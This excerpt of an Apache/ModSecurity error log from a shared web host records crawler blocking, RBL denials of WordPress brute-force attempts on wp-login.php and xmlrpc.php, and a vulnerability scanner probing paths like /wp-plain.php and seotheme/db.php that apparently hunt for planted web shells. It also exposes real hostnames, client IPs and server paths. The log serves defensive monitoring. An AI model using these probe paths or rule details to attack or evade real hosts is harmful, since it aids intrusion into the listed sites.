[Tue May 26 16:56:41.090689 2026] [security2:error] [pid 839808:tid 840044] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDb5qtwAfohijxAqhcIAAAAXI"]
[Tue May 26 16:56:42.956763 2026] [security2:error] [pid 839808:tid 840064] [client 92.222.108.103:47434] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "lifestylemne.me"] [uri "/robots.txt"] [unique_id "ahWDcpqtwAfohijxAqhcZwAAAYY"]
[Tue May 26 16:56:42.956907 2026] [security2:error] [pid 839808:tid 840064] [client 92.222.108.103:47434] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "lifestylemne.me"] [uri "/robots.txt"] [unique_id "ahWDcpqtwAfohijxAqhcZwAAAYY"]
[Tue May 26 16:56:43.010071 2026] [security2:error] [pid 839808:tid 839994] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDcZqtwAfohijxAqhcTwAAAUA"]
[Tue May 26 16:56:44.306366 2026] [security2:error] [pid 839808:tid 840058] [client 142.44.233.107:41418] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "lifestylemne.me"] [uri "/"] [unique_id "ahWDdJqtwAfohijxAqhciAAAAYA"]
[Tue May 26 16:56:44.306497 2026] [security2:error] [pid 839808:tid 840058] [client 142.44.233.107:41418] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "lifestylemne.me"] [uri "/"] [unique_id "ahWDdJqtwAfohijxAqhciAAAAYA"]
[Tue May 26 16:56:45.126914 2026] [security2:error] [pid 839808:tid 839954] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDc5qtwAfohijxAqhcggAAARg"]
[Tue May 26 16:56:46.396183 2026] [security2:error] [pid 839808:tid 839996] [client 77.75.76.166:22584] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWDdpqtwAfohijxAqhcsgAAAUI"]
[Tue May 26 16:56:46.396356 2026] [security2:error] [pid 839808:tid 839996] [client 77.75.76.166:22584] ModSecurity: Warning. Matched phrase "Seznam" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahWDdpqtwAfohijxAqhcsgAAAUI"]
[Tue May 26 16:56:46.524604 2026] [security2:error] [pid 839808:tid 839969] [client 77.75.76.166:30889] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/"] [unique_id "ahWDdpqtwAfohijxAqhcuQAAASc"]
[Tue May 26 16:56:46.524725 2026] [security2:error] [pid 839808:tid 839969] [client 77.75.76.166:30889] ModSecurity: Warning. Matched phrase "Seznam" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/"] [unique_id "ahWDdpqtwAfohijxAqhcuQAAASc"]
[Tue May 26 16:56:47.009618 2026] [security2:error] [pid 839808:tid 840026] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDdZqtwAfohijxAqhcoQAAAWA"]
[Tue May 26 16:56:48.388476 2026] [core:crit] [pid 839808:tid 840039] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:56:48.492836 2026] [security2:error] [pid 839808:tid 840052] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDd5qtwAfohijxAqhcxwAAAXo"]
[Tue May 26 16:56:48.814984 2026] [security2:error] [pid 839808:tid 840009] [client 117.198.37.168:49298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDeJqtwAfohijxAqhc4QAAAU8"]
[Tue May 26 16:56:48.815121 2026] [security2:error] [pid 839808:tid 840009] [client 117.198.37.168:49298] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDeJqtwAfohijxAqhc4QAAAU8"]
[Tue May 26 16:56:50.131306 2026] [security2:error] [pid 839808:tid 839990] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDeZqtwAfohijxAqhc6AAAATw"]
[Tue May 26 16:56:53.003095 2026] [security2:error] [pid 839808:tid 840056] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDe5qtwAfohijxAqhdKAAAAX4"]
[Tue May 26 16:56:54.092594 2026] [security2:error] [pid 839808:tid 839953] [client 158.173.3.214:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDfZqtwAfohijxAqhdTQAAARc"]
[Tue May 26 16:56:54.966107 2026] [security2:error] [pid 839808:tid 839963] [client 66.249.68.129:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWDfJqtwAfohijxAqhdQAAAASE"]
[Tue May 26 16:56:55.059243 2026] [security2:error] [pid 839808:tid 839940] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDfZqtwAfohijxAqhdYQAAAQo"]
[Tue May 26 16:56:56.317325 2026] [security2:error] [pid 839808:tid 839985] [client 185.191.171.1:20392] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWDgJqtwAfohijxAqhdmwAAATc"]
[Tue May 26 16:56:56.317454 2026] [security2:error] [pid 839808:tid 839985] [client 185.191.171.1:20392] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahWDgJqtwAfohijxAqhdmwAAATc"]
[Tue May 26 16:56:56.833029 2026] [security2:error] [pid 839808:tid 840001] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDf5qtwAfohijxAqhdiAAAAUc"]
[Tue May 26 16:56:57.507292 2026] [security2:error] [pid 839808:tid 840027] [client 114.119.136.175:52335] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "gcirsm.org.in"] [uri "/index.php"] [unique_id "ahWDgZqtwAfohijxAqhduQAAAWE"], referer: http://gcirsm.org.in/index.php
[Tue May 26 16:56:57.560644 2026] [core:crit] [pid 839808:tid 840064] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 16:56:58.035679 2026] [security2:error] [pid 839808:tid 840021] [client 45.3.52.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDgZqtwAfohijxAqhdxgAAAVs"], referer: https://www.anujtradingco.com/
[Tue May 26 16:56:58.181160 2026] [security2:error] [pid 839808:tid 840020] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDgJqtwAfohijxAqhdowAAAVo"]
[Tue May 26 16:56:59.011182 2026] [security2:error] [pid 839808:tid 840067] [client 45.3.52.228:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDgpqtwAfohijxAqhd4QAAAYk"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1478647&moderation-hash=bc4d25e314d2f44b11632829b05106a2
[Tue May 26 16:56:59.077653 2026] [security2:error] [pid 839808:tid 839940] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWDgpqtwAfohijxAqhd1QAAAQo"]
[Tue May 26 16:56:59.241873 2026] [security2:error] [pid 839808:tid 839998] [client 117.198.37.168:49622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDg5qtwAfohijxAqhd5wAAAUQ"]
[Tue May 26 16:56:59.241989 2026] [security2:error] [pid 839808:tid 839998] [client 117.198.37.168:49622] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDg5qtwAfohijxAqhd5wAAAUQ"]
[Tue May 26 16:56:59.820831 2026] [security2:error] [pid 839808:tid 839962] [client 36.50.56.161:51746] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "kingsclubbanquet.com"] [uri "/wp-comments-post.php"] [unique_id "ahWDg5qtwAfohijxAqhd5gAAASA"]
[Tue May 26 16:57:00.467731 2026] [security2:error] [pid 839808:tid 840060] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDg5qtwAfohijxAqhd5AAAAYI"]
[Tue May 26 16:57:00.583418 2026] [security2:error] [pid 839808:tid 839962] [client 36.50.56.161:51746] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "kingsclubbanquet.com"] [uri "/wp-comments-post.php"] [unique_id "ahWDg5qtwAfohijxAqhd5gAAASA"]
[Tue May 26 16:57:00.583497 2026] [security2:error] [pid 839808:tid 839962] [client 36.50.56.161:51746] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "kingsclubbanquet.com"] [uri "/wp-comments-post.php"] [unique_id "ahWDg5qtwAfohijxAqhd5gAAASA"]
[Tue May 26 16:57:01.785441 2026] [security2:error] [pid 839808:tid 839941] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWDhZqtwAfohijxAqheHAAAAQs"]
[Tue May 26 16:57:02.278038 2026] [security2:error] [pid 839808:tid 839914] [remote 103.11.102.22:33622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWDhpqtwAfohijxAqheJAABGGc"]
[Tue May 26 16:57:02.601092 2026] [security2:error] [pid 839808:tid 839944] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDhZqtwAfohijxAqheEAAAAQ4"]
[Tue May 26 16:57:02.982192 2026] [security2:error] [pid 839808:tid 840035] [client 114.119.147.166:51267] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/"] [unique_id "ahWDhpqtwAfohijxAqheNgAAAWk"], referer: https://www.ucdc.co.in/upload/?C=D%3BO%3DA
[Tue May 26 16:57:04.214293 2026] [security2:error] [pid 839808:tid 840052] [client 31.57.184.107:53008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jailanitradingcompany.svijaykumar.in"] [uri "/wp-login.php"] [unique_id "ahWDiJqtwAfohijxAqheUAAAAXo"]
[Tue May 26 16:57:04.535069 2026] [security2:error] [pid 839808:tid 839994] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDh5qtwAfohijxAqhePQAAAUA"]
[Tue May 26 16:57:04.988468 2026] [security2:error] [pid 839808:tid 839912] [remote 173.249.15.100:47020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWDiJqtwAfohijxAqheXAABJWU"]
[Tue May 26 16:57:06.168964 2026] [security2:error] [pid 839808:tid 839943] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDiJqtwAfohijxAqheVwAAAQ0"]
[Tue May 26 16:57:07.316156 2026] [security2:error] [pid 839808:tid 839991] [client 74.7.241.185:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWDipqtwAfohijxAqheiQAAAT0"]
[Tue May 26 16:57:07.319000 2026] [security2:error] [pid 839808:tid 840048] [client 74.7.241.185:57820] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "christinaspromotions.com"] [uri "/robots.txt"] [unique_id "ahWDipqtwAfohijxAqhehwABdnw"]
[Tue May 26 16:57:07.675647 2026] [security2:error] [pid 839808:tid 840037] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDipqtwAfohijxAqhegwAAAWs"]
[Tue May 26 16:57:09.040691 2026] [security2:error] [pid 839808:tid 839960] [client 43.172.194.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWDjJqtwAfohijxAqheswAAAR4"]
[Tue May 26 16:57:09.897539 2026] [security2:error] [pid 839808:tid 839969] [client 117.198.37.168:49950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDjZqtwAfohijxAqhexgAAASc"]
[Tue May 26 16:57:09.897721 2026] [security2:error] [pid 839808:tid 839969] [client 117.198.37.168:49950] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWDjZqtwAfohijxAqhexgAAASc"]
[Tue May 26 16:57:10.521493 2026] [security2:error] [pid 839808:tid 840065] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDjJqtwAfohijxAqhevAAAAYc"]
[Tue May 26 16:57:12.102182 2026] [security2:error] [pid 839808:tid 840044] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDjpqtwAfohijxAqhe2AAAAXI"]
[Tue May 26 16:57:13.485414 2026] [autoindex:error] [pid 839808:tid 840006] [client 150.109.21.93:39050] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:57:13.931143 2026] [security2:error] [pid 839808:tid 840060] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDkJqtwAfohijxAqhe-gAAAYI"]
[Tue May 26 16:57:14.409159 2026] [security2:error] [pid 839808:tid 840002] [client 85.208.96.208:11280] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWDkpqtwAfohijxAqhfHwAAAUg"]
[Tue May 26 16:57:14.409293 2026] [security2:error] [pid 839808:tid 840002] [client 85.208.96.208:11280] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWDkpqtwAfohijxAqhfHwAAAUg"]
[Tue May 26 16:57:14.932936 2026] [security2:error] [pid 839808:tid 839820] [remote 111.229.141.137:46794] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWDkpqtwAfohijxAqhfKQABcgk"]
[Tue May 26 16:57:15.948888 2026] [security2:error] [pid 839808:tid 840014] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWDkpqtwAfohijxAqhfJQAAAVQ"]
[Tue May 26 16:57:16.650344 2026] [security2:error] [pid 839808:tid 840026] [client 119.13.218.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWDlJqtwAfohijxAqhfSAAAAWA"]
[Tue May 26 16:57:17.444937 2026] [security2:error] [pid 839808:tid 840005] [client 20.151.111.128:10527] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWDlZqtwAfohijxAqhfXgAAAUs"], referer: www.google.com
[Tue May 26 16:57:17.448370 2026] [security2:error] [pid 839808:tid 840031] [client 20.151.111.128:10552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWDlZqtwAfohijxAqhfXwAAAWU"], referer: www.google.com
[Tue May 26 16:57:17.522019 2026] [security2:error] [pid 839808:tid 839953] [client 20.151.111.128:7333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWDlZqtwAfohijxAqhfZgAAARc"], referer: www.google.com
[Tue May 26 16:57:17.530339 2026] [security2:error] [pid 839808:tid 839964] [client 20.151.111.128:10538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWDlZqtwAfohijxAqhfXQAAASI"], referer: www.google.com
